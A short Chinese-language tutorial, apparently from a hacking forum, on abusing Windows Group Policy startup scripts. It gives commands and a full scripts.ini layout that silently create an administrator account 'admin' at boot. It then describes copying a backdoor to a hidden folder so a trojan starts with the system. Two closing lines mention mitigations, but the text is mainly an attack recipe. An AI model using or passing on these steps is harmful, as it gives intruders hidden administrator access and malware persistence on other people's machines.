1、組策略啟動腳本
利用過程：啟動組策略（運行->gpedit.msc->計算機配置->Windows 設定->腳本（啟動/關機） ）
2、啟動與關機相關設定
選擇啟動->屬性->添加，會彈出選擇腳本名。選擇程式 C:\windows\System32\net.exe，參數 useradmin /add 來執行 net user admin /add。再同樣添加C:\Windows\system32\net.exelocalgroup administrators admin /add來執行 net localgroup administratorsadmin /add。
費話少說： 再經過進一步了解的時候發現這裡是由C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\scripts.ini（PS：默認是隱藏的。）來控制 shutdown 和 Startup 的。
ini組成方式如下：
[Startup]
0CmdLine=C:\WINDOWS\system32\net.exe
0Parameters=user admin /add
1CmdLine=C:\WINDOWS\system32\net.exe
1Parameters=localgroup administrators admin /add
[Shutdown]
0CmdLine=1.bat
0Parameters=
[startup] \\代表是啟動
0CmdLine=C:\WINDOWS\system32\net.exe \\腳本名
0Parameters=user admin /add \\腳本參數
1CmdLine=C:\WINDOWS\system32\net.exe \\第二條腳本名
1Parameters=localgroup administrators admin /add \\第二條腳本參數
[Shutdown] \\關閉
0CmdLine=1.bat \\腳本名 1.bat 目錄隊應於
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup
0Parameters= \\參數
也就是說 scripts.ini 控制著整個啟動，就如同以前 win.ini 一樣。
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup\ 啟動檔案的目錄，那樣腳本名路徑就可以不用加詳細目錄名了。
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\shutdown\ 關閉檔案目錄，同上。
思路就這樣，copy 後門到非常隱藏的目錄，再加個啟動腳本參數，實現木馬啟動。
解決此缺陷的方法：組策略->計算機配置->管理模板->系統->腳本，相應的禁止就行了。
或者來招毒的，徹底禁止掉這個：把scripts.ini 對套用戶許可權全部刪除，system administrators 全部取消，就沒人能訪問了。
以上在 Windows XP SP2 均已測試成功。